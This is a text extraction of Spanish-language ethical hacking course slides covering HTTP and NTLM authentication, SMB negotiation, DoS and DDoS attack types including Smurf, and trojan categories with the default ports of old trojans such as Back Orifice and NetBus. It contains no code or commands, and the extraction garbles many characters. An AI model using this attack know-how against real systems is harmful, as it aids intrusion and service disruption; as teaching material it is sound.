![Page 58: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/58.jpg)
Auten:cación HTML Básica
![Page 59: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/59.jpg)
Digest Authen:ca:on " La contraseña no se u:liza directamente en
la auten:cación, sino, por ejemplo: – HA1 = MD5 (nombre de usuario: entorno: contraseña).
" Se basa en el esquema reto-‐ respuesta
![Page 60: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/60.jpg)
Digest Authen:ca:on
Servidor de Autenticación
Servidor Envía Reto
Usuario Cifra Reto con Clave
Usuario envía Reto Cifrado
Servidor compara reto enviado con reto recibido
Cliente
LA CLAVE NUNCA PASA POR LA RED!!
![Page 61: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/61.jpg)
Auten:cación NTLM " Cons:tuye una variante de la auten:cación
mediante resúmenes criptográficos. " Se trata igualmente una forma segura de
auten:cación en la medida en que no se envían ni la contraseña ni el nombre de usuario a través de la red.
– Sólo está soportado por Microso] Internet Explorer, versión 2.0 o posterior y servidores NT.
– No funciona para conexiones con proxy.
![Page 62: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/62.jpg)
¿Cómo ocurre la auten:cación en redes Microso]?
" Cuando un usuario envía la orden para acceder a \\maquina\recurso_compar:do se efectúan los siguientes pasos:
– Establecimiento de sesión TCP – Establecimiento de sesión NetBIOS – Negociación SMB (Server Message Block) – Auten:cación Challenge-‐Response
![Page 63: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/63.jpg)
SMB " SMB (Server Message Block) es el protocolo a nivel capa
Aplicación usado en las redes Microso]. " Por razones de compa:bilidad, los nuevos sistemas opera:vos siempre “comprenden” a los anteriores. " Durante la negociación el cliente envía la lista de dialectos
que comprende, el server selecciona uno en común (normalmente el más nuevo) y devuelve esa información al cliente.
" Conjuntamente con esa información el servidor envía el reto.
![Page 64: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/64.jpg)
DoS
![Page 65: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/65.jpg)
¿Como se inicia un DoS? " Se comienza un ataque de DoS explotando
una vulnerabilidad en un sistema informá:co.
" La idea detrás de un ataque de este :po es dejar fuera al sistema víc:ma, principalmente por inanición de recursos.
" La principal dificultad (del lado de la víc:ma) radica en detener el ataque y reconocer las solicitudes apócrifas de las verdaderas.
![Page 66: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/66.jpg)
Algunos Ataques de DoS
" SYN flood " TCP FIN flood " Connec:on flood " Land Atack " finger bomb " email bomb " MAC flooding " DNS flood
" Supernuke/Winnuke " Teardrop/Newtear " Paquetes fragmentados " Bucle UDP/Snork UDP
![Page 67: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/67.jpg)
DoS y DDoS
![Page 68: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/68.jpg)
DDoS en el Mundo ( 2007)
![Page 69: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/69.jpg)
Smurf
" Enviar un paquete ICMP-‐Echo-‐Request a un‘SMURF amplifier’ network (A-‐class broadcast address). " Todos los ordenadores de esa red responden a la dirección de origen
![Page 70: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/70.jpg)
¿Qué es un Troyano? " Un Troyano es un pequeño programa que corre a escondidas y que infecta a un computador. " Con la ayuda de un Troyano, un atacante puede obtener acceso a passwords, modificar parámetros de operación de la computadora infectada, etc.
![Page 71: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/71.jpg)
Tipos de Troyanos " Security So]ware Disablers " Destruc:ve " Remote Access " Data-‐Sending " Denial-‐of-‐Service (DoS) Apack " Proxy
![Page 72: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/72.jpg)
Puertos u:lizados por (algunos) troyanos
Back Orifice 31337-38 /UDP
Deep Throat 2140, 3150/UDP
NetBus 12345,12346/TCP
NetBus 2 Pro 20034/TCP
Back Orifice 31337-38 /UDP
![Page 73: Ethical(Hacking( - the-eye.eu 3. Búsqueda de información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como](https://reader031.fdocuments.co/reader031/viewer/2022021715/5c4d18a093f3c34aee5620ff/html5/thumbnails/73.jpg)
Fin